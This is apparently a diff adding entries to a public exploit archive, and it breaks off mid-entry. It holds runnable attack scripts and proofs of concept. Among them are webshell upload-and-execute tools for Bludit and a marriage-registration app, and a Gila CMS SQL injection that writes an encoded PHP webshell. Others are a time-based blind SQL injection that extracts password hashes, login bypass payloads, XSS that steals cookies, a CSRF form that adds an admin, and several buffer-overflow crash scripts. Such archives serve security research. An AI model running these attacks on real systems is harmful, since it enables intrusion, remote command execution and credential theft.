name=\"witnessnames\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddresssec\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"witnessnamet\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddressthird\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"submit\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------8759967759481129101498329242--\x0d\x0a' \
$"$url/user/marriage-reg-form.php" >>/dev/null
}
upload
#Execute the given command
shell_file=$(curl -s $url/user/images/ | grep ".php" | grep -Eo 'href="[^\"]+"' | sed 's/href=//g' | sed 's/\"//g' | grep -m1 '')
check=$(echo $command | grep " " | wc -l)
if [[ $check > 0 ]]
then
fixed_command=$(echo $command | sed 's/ /%20/g')
curl -s "$url/user/images/$shell_file?cmd=$fixed_command"
else
curl -s "$url/user/images/$shell_file?cmd=$command"
fi
echo "IF YOU DONT GET RESPONSE OF THE COMMAND YOU GAVE, PROBABLY YOU GAVE WRONG CREDENTIALS"
echo "After first exploit, even if you give wrong credentials it'll work since the file is already uploaded"
shift $((OPTIND-1))

40
exploits/php/webapps/48559.txt Normal file
View file

@ -0,0 +1,40 @@
# Exploit Title: Online Course Registration 1.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-06-05
# Exploit Author: BKpatron
# Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A
# my website: bkpatron.com
# Vulnerability: Attacker can bypass login page and access to dashboard page
# vulnerable file : admin/index.php
# Parameter & Payload: '=''or'
# Proof of Concept:
http://localhost/Online%20Course%20Registration/admin/index.php
POST /Online%20Course%20Registration/admin/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Referer: http://localhost/Online%20Course%20Registration/admin/index.php
Cookie: PHPSESSID=il6a0lzq8ndo1bb4672rd7cr3m
Connection: keep-alive
Upgrade-Insecure-Requests: 1
username=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=: undefined
HTTP/1.1 302 Found
Date: Thu, 04 Jun 2020 20:04:27 GMT
Server: Apache/2.4.39 (Win64) PHP/7.3.5
X-Powered-By: PHP/7.3.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
location: http://localhost/Online Course Registration/admin/change-password.php

34
exploits/php/webapps/48560.py Executable file
View file

@ -0,0 +1,34 @@
# Exploit Title: Online-Exam-System 2015 - 'feedback' SQL Injection
# Date: 2020-06-04
# Exploit Author: Gus Ralph
# Vendor Homepage: https://github.com/sunnygkp10/
# Software Link: https://github.com/sunnygkp10/Online-Exam-System-.git
# Affected Version: 2015
# Tested on: Ubuntu
# CVE : N/A
import requests, string, time
from sys import stdout
URL = raw_input("Please enter the URL to attack (example http://localhost/Online-Exam-System/)\n")
payload = "feedback' , '2020-06-04', '01:58:10am'),('1337','test','test@test.com','test',(SELECT CASE WHEN (SELECT EXISTS(SELECT password FROM user WHERE password REGEXP BINARY '^"
payload2 = ".*'))=1 THEN sleep(5) ELSE sleep(0) END),'2020-06-04', '01:58:10am'); -- -"
so_far = hash = ""
while True:
for i in string.digits + string.ascii_lowercase:
so_far = hash + i
payload_to_send = payload + str(so_far) + payload2
data = {"name":"test","email":"test@test.com","subject":"test","feedback":payload_to_send}
start = time.time()
r = requests.post(URL + "feed.php", data = data)
request_time = time.time() - start
if request_time > 5:
hash += i
stdout.write(i)
stdout.flush()
break
if len(hash) > 31:
stdout.write("\n")
print "Hash found: " + hash
break

23
exploits/php/webapps/48562.txt Normal file
View file

@ -0,0 +1,23 @@
# Exploit Title: Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection
# Date: 2020-06-07
# Exploit Author: Pankaj Kumar Thakur
# Vendor Homepage: http://virtualairlinesmanager.net/
# Dork: inurl:notam_id=
# Affected Version: 2.6.2
# Tested on: Ubuntu
# CVE : N/A
Vulnerable parameter
-------------------
notam_id=%27%27
Id parameter's value is going into sql query directly!
Proof of concept
---------------
https://localhost:8080/vam/index.php?page=notam&notam_id=11%27%27
Submitted: Jun 1 2020
Fixed: Jun 5 2020
Acknowledgement : https://ibb.co/Y3WYdFN

64
exploits/php/webapps/48567.txt Normal file
View file

@ -0,0 +1,64 @@
# Exploit Title: Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection
# Google Dork: N/A
# Date: 2020-06-08
# Exploit Author: Kostadin Tonev
# Vendor Homepage: http://virtualairlinesmanager.net
# Software Link: https://virtualairlinesmanager.net/index.php/vam-releases/
# Version: 2.6.2
# Tested on: Linux Mint
# CVE : N/A
. . . . . . . . . + .
. . : . .. :. .___---------___.
. . . . :.:. _".^ .^ ^. '.. :"-_. .
. : . . .:../: . .^ :.:\.
. . :: +. :.:/: . . . . . .:\
. : . . _ :::/: . ^ . . .:\
.. . . . - : :.:./. . .:\
. . . :..|: . . ^. .:|
. . : : ..|| . . . !:|
. . . . ::. ::\( . :)/
. . : . : .:.|. ###### .#######::|
:.. . :- : .: ::|.####### ..########:|
. . . .. . .. :\ ######## :######## :/
. .+ :: : -.:\ ######## . ########.:/
. .+ . . . . :.:\. ####### #######..:/
:: . . . . ::.:..:.\ . . ..:/
. . . .. : -::::.\. | | . .:/
. : . . .-:.":.::.\ ..:/
. -. . . . .: .:::.:.\. .:/
. . . : : ....::_:..:\ ___. :/
. . . .:. .. . .: :.:.:\ :/
+ . . : . ::. :.:. .:.|\ .:/|
. + . . ...:: ..| --.:|
. . . . . . . ... :..:.."( ..)"
. . . : . .: ::/ . .::\
[1] Vulnerable GET parameter: notam_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=notam&notam_id=[SQLi]
[2] Vulnerable GET parameter: airport=[SQLi]
[PoC] http://localhost/vam/index.php?page=airport_info&airport=[SQLi]
[3] Vulnerable GET parameter: registry_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi]
[4] Vulnerable GET parameter: plane_location=[SQLi]
[PoC] http://localhost/vam/index.php?page=fleet_public&plane_location=[SQLi]
[5] Vulnerable GET parameter: hub_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=hub&hub_id=[SQLi]
[6] Vulnerable GET parameter: pilot_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=pilot_details&pilot_id=[SQLi]
[7] Vulnerable GET parameter: registry_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi]
[8] Vulnerable GET parameter: event_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=event&event_id=[SQLi]
[9] Vulnerable GET parameter: tour_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=tour_detail&tour_id=[SQLi]

114
exploits/php/webapps/48568.py Executable file
View file

@ -0,0 +1,114 @@
# Exploit Title: Bludit 3.9.12 - Directory Traversal
# Date: 2020-06-05
# Exploit Author: Luis Vacacas
# Vendor Homepage: https://www.bludit.com
# Software Link: https://github.com/bludit/bludit
# Version: >= 3.9.12
# Tested on: Ubuntu 19.10
# CVE : CVE-2019-16113
#!/usr/bin/env python3
#-*- coding: utf-8 -*-
import requests
import re
import argparse
import random
import string
import base64
from requests.exceptions import Timeout
class Color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
banner = base64.b64decode("4pWU4pWXIOKUrCAg4pSsIOKUrOKUjOKUrOKUkOKUrOKUjOKUrOKUkCAg4pWU4pWQ4pWX4pWmIOKVpuKVlOKVl+KVlArilaDilanilZfilIIgIOKUgiDilIIg4pSC4pSC4pSCIOKUgiAgIOKVoOKVkOKVneKVkeKVkeKVkeKVkeKVkeKVkQrilZrilZDilZ3ilLTilIDilJjilJTilIDilJjilIDilLTilJjilLQg4pS0ICAg4pWpICDilZrilanilZ3ilZ3ilZrilZ0KCiBDVkUtMjAxOS0xNjExMyBDeWJlclZhY2EKCg==").decode()
print(Color.RED + Color.BOLD + "\n\n" + banner + Color.END)
def get_args():
parser = argparse.ArgumentParser(description='Bludit RCE Exploit v3.9.2 CVE-2019-16113 \nBy @CyberVaca')
parser.add_argument('-u', dest='url', type=str, required=True, help='Url Bludit')
parser.add_argument('-user', dest='user', type=str,required=True, help='Username')
parser.add_argument('-pass', dest='password', type=str, required=True, help='Password' )
parser.add_argument('-c', dest='command', type=str, required=True, help='Command to execute' )
return parser.parse_args()
def randomString(stringLength=8):
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(stringLength))
def informa(msg):
print (Color.GREEN + "[" + Color.RED + "+" + Color.GREEN + "] " + msg)
def login(url,username,password):
session = requests.Session()
login_page = session.get(url + "/admin/")
csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
informa("csrf_token: " + Color.END + csrf_token)
la_cookie = ((login_page.headers['Set-Cookie']).split(";")[0].split("=")[1])
paramsPost = {"save":"","password":password,"tokenCSRF":csrf_token,"username":username}
headers = {"Origin":url,"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Referer": url + "/admin/","Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate","Content-Type":"application/x-www-form-urlencoded"}
cookies = {"BLUDIT-KEY":la_cookie}
response = session.post(url + "/admin/", data=paramsPost, headers=headers, cookies=cookies, allow_redirects = False)
informa("cookie: " + Color.END + la_cookie)
return(la_cookie)
def csrf_logado(url,la_cookie):
session = requests.Session()
headers = {"Origin":url,"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Referer":url + "/admin/","Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate"}
cookies = {"BLUDIT-KEY":la_cookie}
response = session.get(url + "/admin/dashboard", headers=headers, cookies=cookies)
token_logado = response.text.split('var tokenCSRF = "')[1].split('"')[0]
informa("csrf_token: " + Color.END + token_logado)
return token_logado
def subida_shell(url,la_cookie,token_logado,command,webshell):
session = requests.Session()
paramsPost = {"uuid":"../../tmp","tokenCSRF":token_logado}
paramsMultipart = [('images[]', (webshell, "<?php shell_exec(\"rm .htaccess ; rm " + webshell + " ;" + command + "\");?>", 'application/octet-stream'))]
headers = {"Origin":url,"Accept":"*/*","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Referer":url + "/admin/new-content","Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate"}
cookies = {"BLUDIT-KEY":la_cookie}
response = session.post(url + "/admin/ajax/upload-images", data=paramsPost, files=paramsMultipart, headers=headers, cookies=cookies)
informa("Uploading " + Color.END + webshell + Color.END)
def subida_htaccess(url,la_cookie,token_logado):
session = requests.Session()
paramsPost = {"uuid":"../../tmp","tokenCSRF":token_logado}
paramsMultipart = [('images[]', ('.htaccess', "RewriteEngine off\r\nAddType application/x-httpd-php .jpg", 'application/octet-stream'))]
headers = {"Origin":url,"Accept":"*/*","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Referer":url + "/admin/new-content","Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate"}
cookies = {"BLUDIT-KEY":la_cookie}
response = session.post(url + "/admin/ajax/upload-images", data=paramsPost, files=paramsMultipart, headers=headers, cookies=cookies)
def trigger_command(url,webshell,command):
session = requests.Session()
headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate"}
try:
response = session.get(url + "/bl-content/tmp/" + webshell, headers=headers, timeout=1)
except requests.exceptions.ReadTimeout:
pass
informa("Executing command: " + Color.END + command )
informa("Delete: " + Color.END + ".htaccess")
informa("Delete: " + Color.END + webshell)
if __name__ == '__main__':
args = get_args()
webshell = randomString(8) + ".jpg"
la_cookie = login(args.url,args.user,args.password)
token_logado = csrf_logado(args.url,la_cookie)
subida_shell(args.url,la_cookie,token_logado,args.command,webshell)
subida_htaccess(args.url,la_cookie,token_logado)
trigger_command(args.url,webshell,args.command)

40
exploits/php/webapps/48571.txt Normal file
View file

@ -0,0 +1,40 @@
# Exploit Title: Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin)
# Google Dork: N/A
# Date: 2020-06-10
# Exploit Author: Extinction
# Vendor Homepage: https://adikiss.net/
# Software Link: https://adikiss.net/2014/06/aplikasi-sistem-informasi-pengumuman-kelulusan-online-2/
# Version: latest
# Tested on: Linux,windows,macOS
# Description SpearSecurity :
# CSRF vulnerability was discovered in Sistem kelulusan.
# With this vulnerability, authorized users can be added to the system.
POC:
<html>
<body>
<center>
<hr>
<form action="http://localhost.com/[path]admin/tambahuser.php" method="POST">
<input type="text" class="form-control" name="nama"
placeholder="Username" size="35">
<br>
<input type="text" class="form-control" name="username"
placeholder="Spear" size="35">
<br>
<input type="text" class="form-control" name="pass"
placeholder="Security" size="35">
<br>
<br>
<input type="submit" name="submit" id="submit" value="Simpan Data"
class="btn btn-primary" onclick="tb_remove()">
</form>
<hr>
<h1> CODED BY SPEAR-SECURITY </h1>
<h2> Author Extinction </h2>
</body>
</html>
#SpearSecurity-ID

39
exploits/php/webapps/48572.txt Normal file
View file

@ -0,0 +1,39 @@
# Exploit Title: Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)
# Date: 2020-04-17
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
# Vendor Homepage: https://www.j2store.org/
# Software Link: https://www.j2store.org/download.html
# Reference: https://www.j2store.org/download-j2store/j2store-v3-3-3-13.html
# Change Log: https://www.j2store.org/download-j2store/j2store-v3-3-3-13.html
# Version: 3.3.11
# Tested on: Kali Linux - Apache2
--------------------------------------------------------------------------------
Detail:
--------------------------------------------------------------------------------
File: administrator/components/com_j2store/models/products.php
Vulnerable parameter: filter_order_Dir, filter_order
PoC:
Request:
--------------------------------------------------------------------------------
POST /joomla/administrator/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/joomla/administrator/index.php?option=com_j2store&view=products
Content-Type: application/x-www-form-urlencoded
Content-Length: 312
Connection: close
Cookie: [COOIKE]
Upgrade-Insecure-Requests: 1
option=com_j2store&view=products&task=browse&boxchecked=0&filter_order=[SQLi]&filter_order_Dir=[SQLi]&2d42ab72d5c2716881de5d802d08ca7f=1&search=1&product_type=0&limit=20&since=&until=&productid_from=&productid_to=&pricefrom=&priceto=&sku=&manufacturer_id=&vendor_id=&taxprofile_id=&visible=&limitstart=0
--------------------------------------------------------------------------------
sqlmap -r sqli --dbs --risk=3 --level=5 --random-agent -p filter_order_Dir
--------------------------------------------------------------------------------

24
exploits/php/webapps/48574.txt Normal file
View file

@ -0,0 +1,24 @@
# Exploit Title: Virtual Airlines Manager 2.6.2 - 'id' SQL Injection
# Date: 2020-06-09
# Exploit Author: Mosaaed
# Vendor Homepage: http://virtualairlinesmanager.net/
# Dork: N/A
# Affected Version: 2.6.2
# Tested on: Ubuntu
# CVE : N/A
-------------------
xss
http://localhost/vam/index.php?page=plane_info_public&registry_id=“><<script>alert(document.cookie);//<</script>
http://localhost/vam/index.php?page=fleet_public&plane_icao=1“><<script>alert(document.cookie);//<</script>
http://localhost/vam/index.php?page=hub&hub_id=1“><<script>alert(document.cookie);//<</script>
http://localhost/vam/index.php?page=fleet_public&plane_location=1“><<script>alert(document.cookie);//<</script>
http://localhost/vam/index.php?page=event&event_id=1“><<script>alert(document.cookie);//<</script>
-------------------------
SQL Injection
sqlmap -u "http://localhost/vam/index.php?page=manual_flight_details&ID=10" -p ID --dbs
sqlmap -u "http://localhost/vam/index.php?page=plane_info_public&registry_id=10" -p registry_id --db
sqlmap -u "http://localhost/vam/index.php?page=fleet_public&plane_icao=1" -p plane_icao --dbs
sqlmap -u "http://localhost/vam/index.php?page=hub&hub_id=1" -p hub_id --dbs
sqlmap -u "http://localhost/vam/index.php?page=fleet_public&plane_location=1" -p plane_location --dbs

47
exploits/php/webapps/48590.py Executable file
View file

@ -0,0 +1,47 @@
# Exploit Title: Gila CMS 1.11.8 - 'query' SQL Injection
# Date: 2020-06-15
# Exploit Author: Carlos Ramírez L. (BillyV4)
# Vendor Homepage: https://gilacms.com/
# Software Link: https://github.com/GilaCMS/gila/releases/tag/1.11.8
# Version: Gila 1.11.8
# Tested on: Gila 1.11.8
# CVE : CVE-2020-5515
import requests as req
import time as vremeto
import sys as sistemot
import re as regularno
if len(sistemot.argv) < 2:
print("Usage: ./CVE_2020_5515.py ip:port")
sistemot.exit(19)
else:
ip = sistemot.argv[1]
cookies = {'PHPSESSID': 'r2k5bp52edr9ls36d35iohdlng', 'GSESSIONID': '21k2mbxockr9sf1v1agxkwpkt6ruzdl6vjz6fgmt7s0e72hlas'}
webpath = "/gila-1.11.8/admin/sql?query="
query1 = "SELECT id FROM user LIMIT 0,1 INTO OUTFILE "
localpath = "\'C://xampp//htdocs//"
shellname = "webshell.php\' "
query2 = "LINES TERMINATED BY "
print("[*] Injecting ")
cmdphp = "0x3c3f70687020696628697373657428245f524551554553545b27636d64275d29297"
cmdphp += "b2024636d64203d2028245f524551554553545b27636d64275d293b2073797374656d"
cmdphp += "2824636d64293b206563686f20273c2f7072653e24636d643c7072653e273b2064696"
cmdphp += "53b207d203f3e"
url = 'http://' + ip + webpath + query1 + localpath + shellname + query2 + cmdphp
r = req.get(url, cookies=cookies)
vremeto.sleep(1)
print("[*] Executing")
r = req.get("http://" + ip + "/" + shellname + "?cmd=whoami")
print("You have a webshell in http://" + ip + "/" + shellname "?cmd=command")

35
exploits/php/webapps/48593.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: College-Management-System-Php 1.0 - Authentication Bypass / SQL Injection
# Exploit Author: BLAY ABU SAFIAN (Inveteck Global)
# Website: https://github.com/olotieno/College-Management-System-Php
# Date: 2020-06-16
# Google Dork: N/A
# Vendor: https://github.com/olotieno/
# Software Link: https://github.com/olotieno/College-Management-System-Php.git
# Affected Version: N/A
# Patched Version: unpatched
# Category: Web Application
# Tested on: MAC
The College Management System Php suffers from sql injection vulnerabilities in the index.php page:
$msg="";
if(isset($_POST['btn_log'])){
$uname=$_POST['unametxt'];
$pwd=$_POST['pwdtxt'];
$sql=mysqli_query($con,"SELECT * FROM users_tbl
WHERE username='$uname' AND password='$pwd'
SQL injection vulnerability:-
in file index.php data from POST parameter 'unametxt' and 'pwdtxt' are not getting filter before passing into SQL query and hence rising SQL Injection vulnerability
payload:
' or 1=1 --
Thank you
regards
Abu Safian Blay
https://inveteckglobal.com<http://inveteckglobal.com>

20
exploits/php/webapps/48605.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: Beauty Parlour Management System 1.0 - Authentication Bypass
# Google Dork: N/A
# Exploit Author: Prof. Kailas PATIL (krp)
# Date: 2020-06-18
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/
# Version: v1.0
# Category: Webapps
# Tested on: LAMP for Linux
# Description:
# Password and username parameters have sql injection vulnerability in Admin login panel.
#
#------------------------------------------------------
#
# Login Link: http://localhost/bpms/admin/index.php
# username: ' or '1'='1'#
# password: blah123
#
#------------------------------------------------------

27
exploits/watchos/dos/47404.pl Executable file
View file

@ -0,0 +1,27 @@
# Exploit Title: SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service (DoS)
# Exploit Author: Emilio Revelo
# Date: 2019-09-20
# Software Link : http://www.nsauditor.com/downloads/spotie_setup.exe
# Tested on: Windows 10 Pro x64 es
# Steps to produce the DoS:
# 1.- Run perl script : perl SpotIE.pl
# 2.- Open SpotIE.txt and copy the content to clipboard
# 3.- Open SpotIE Internet Explorer Password Recovery
# 4.- Navigate to Register -> Enter the registration name and key below...
# 5.- Paste ClipBoard on "Key:"
# 7.- OK
# 8.- Crashed!!
#!/usr/local/bin/perl
use strict;
use warnings;
my $filename = 'SpotIE.txt';
open(my $fh, '>', $filename) or die "Could not open file '$filename' $!";
print $fh "E"x256;
close $fh;
print "Done!\n";
print "File: SpotIE.txt\n"

30
exploits/watchos/dos/47406.py Executable file
View file

@ -0,0 +1,30 @@
# Exploit Title: InputMapper < 1.6.10 Local Denial of Service
# Date: 20.09.2019
# Vendor Homepage: https://inputmapper.com/
# Software Link: https://inputmapper.com/downloads/category/2-input-mapper
# Exploit Author: elkoyote07
# Tested Version: 1.6.10
# Tested on: Windows 10 x64
# 1.- Start Input Mapper
# 2.- Click on Guest (Top left)
# 3.- Click on Login
# 3.- Copy the content of exploit.txt in the Username field
# 4.- Once copied double-click on Username field
# 5.- Happy crash :)
#!/usr/bin/python
t = "A" * 15000
try:
f=open("exploit.txt","w")
f.write(t)
f.close()
print "Done"
except:
print "Error"

26
exploits/windows/dos/38079.py Executable file
View file

@ -0,0 +1,26 @@
#!/usr/bin/python
import socket
import sys
from struct import pack
try:
server = sys.argv[1]
port = 80
size = 260
httpMethod = b"GET /"
inputBuffer = b"\x41" * size
httpEndRequest = b"\r\n\r\n"
buf = httpMethod + inputBuffer + httpEndRequest
print("Sending evil buffer...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
s.send(buf)
s.close()
print("Done!")
except socket.error:
print("Could not connect!")

8
exploits/windows/dos/43197.py Executable file
View file

@ -0,0 +1,8 @@
#!/usr/bin/python
buffer = b"http://"
buffer += b"\x41" * 1500
f=open("player.m3u","wb")
f.write(buffer)
f.close()

33
exploits/windows/dos/43200.py Executable file
View file

@ -0,0 +1,33 @@
#!/usr/bin/python
import socket
import sys
try:
server = sys.argv[1]
port = 80
size = 800
inputBuffer = b"A" * size
content = b"username=" + inputBuffer + b"&password=A"
buffer = b"POST /login HTTP/1.1\r\n"
buffer += b"Host: " + server.encode() + b"\r\n"
buffer += b"User-Agent: Mozilla/5.0 (X11; Linux_86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
buffer += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer += b"Accept-Language: en-US,en;q=0.5\r\n"
buffer += b"Referer: http://10.11.0.22/login\r\n"
buffer += b"Connection: close\r\n"
buffer += b"Content-Type: application/x-www-form-urlencoded\r\n"
buffer += b"Content-Length: "+ str(len(content)).encode() + b"\r\n"
buffer += b"\r\n"
buffer += content
print("Sending evil buffer...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
s.send(buffer)
s.close()
print("Done!")
except socket.error:
print("Could not connect!")

31
exploits/windows/dos/44481.py Executable file
View file

@ -0,0 +1,31 @@
#!/usr/bin/python
import socket
import sys
from struct import pack
try:
server = sys.argv[1]
port = 9121
size = 1000
inputBuffer = b"\x41" * size
header = b"\x75\x19\xba\xab"
header += b"\x03\x00\x00\x00"
header += b"\x00\x40\x00\x00"
header += pack('<I', len(inputBuffer))
header += pack('<I', len(inputBuffer))
header += pack('<I', inputBuffer[-1])
buf = header + inputBuffer
print("Sending evil buffer...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
s.send(buf)
s.close()
print("Done!")
except socket.error:
print("Could not connect!")

35
exploits/windows/dos/47393.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: Notepad++ all x64 versions before 7.7. Remote memory corruption via .ml file.
# Google Dork: N/A
# Date: 2019-09-14
# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com)
# Vendor Homepage: https://notepad-plus-plus.org/
# Version: < 7.7
# Tested on: Windows x64
# CVE : CVE-2019-16294
# Description:
SciLexer.dll in Scintilla in Notepad++ (x64) before 7.7 allows remote code execution or denial of service via Unicode characters in a crafted .ml file.
Open aaaaa.ml via affected notepad++
POC files:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/47393.zip
Result:
(230.c64): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Notepad++\SciLexer.dll -
rax=00007ff8e64014c0 rbx=00000000000aaaaa rcx=00000000000aaaaa
rdx=0000000000000003 rsi=0000000000000000 rdi=00000000ffffffff
rip=00007ff8e63c071d rsp=000000aa06463d60 rbp=000000aa06463e81
r8=0000000000002fc8 r9=0000000000000000 r10=000000000000fde9
r11=000000aa06463d90 r12=0000000000000000 r13=0000000000000000
r14=0000000000000001 r15=0000000000000002
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
SciLexer!Scintilla_DirectFunction+0x950dd:
00007ff8e63c071d 0fb70458 movzx eax,word ptr [rax+rbx*2] ds:00007ff8e6556a14=????

26
exploits/windows/dos/47795.py Executable file
View file

@ -0,0 +1,26 @@
# Exploit Title: SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH)
# Date: 2019-12-18
# Exploit Author: Chris Inzinga
# Vendor Homepage: http://www.bimesoft.com/
# Software Link: https://www.softpedia.com/get/Internet/Offline-Browsers/SurfOffline.shtml
# Version: 2.2.0.103
# Tested on: Windows 7 SP1 (x86)
# Steps to reproduce:
# 1. Generate a malicious payload via the PoC
# 2. In the application set the 'Start Page URL' to any value, it doesn't matter.
# 3. Paste the PoC payload as the 'Project Name' and click 'next' and 'finish'.
# 4. Observe a program DOS crash, overwriting SEH=20
#!/usr/bin/python
payload =3D "A" * 382 + "B" * 4 + "C" * 4
try:
fileCreate =3Dopen("exploit.txt","w")
print("[x] Creating file")
fileCreate.write(payload)
fileCreate.close()
print("[x] File created")
except:
print("[!] File failed to be created")

21
exploits/windows/dos/47801.py Executable file
View file

@ -0,0 +1,21 @@
# Exploit Title: XnConvert 1.82 - Denial of Service (PoC)
# Date: 2019-12-21
# Vendor Homepage: https://www.xnview.com
# Software Link: https://www.xnview.com/en/apps/
# Exploit Author: Gokkulraj (TwinTech Solutions)
# Tested Version: v1.82
# Tested on: Windows 7 x64
# 1.- Download and install XnConvert
# 2.- Run python code : XnConvert.py
# 3.- Open EVIL.txt and copy content to clipboard
# 4.- Open XnConvert and Click 'EnterKey'
# 5.- Paste the content of EVIL.txt into the Field: 'User Name and Registration Code'
# 6.- Click 'OK' and you will see a pop-up stating Invalid code and then click 'OK' you will see the crash.
#!/usr/bin/env python
Dos= "\x41" * 9000
myfile=open('Evil.txt','w')
myfile.writelines(Dos)
myfile.close()
print("File created")

33
exploits/windows/dos/47849.py Executable file
View file

@ -0,0 +1,33 @@
# Exploit Title: SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/spotftp_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
=======================
1.Download and install SpotFTP
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Key' and click on 'Ok'
6.SpotFTP Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")

33
exploits/windows/dos/47872.py Executable file
View file

@ -0,0 +1,33 @@
# Exploit Title: SpotDialup 1.6.7 - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/spotdialup_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
=======================
1.Download and install SpotDialup
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
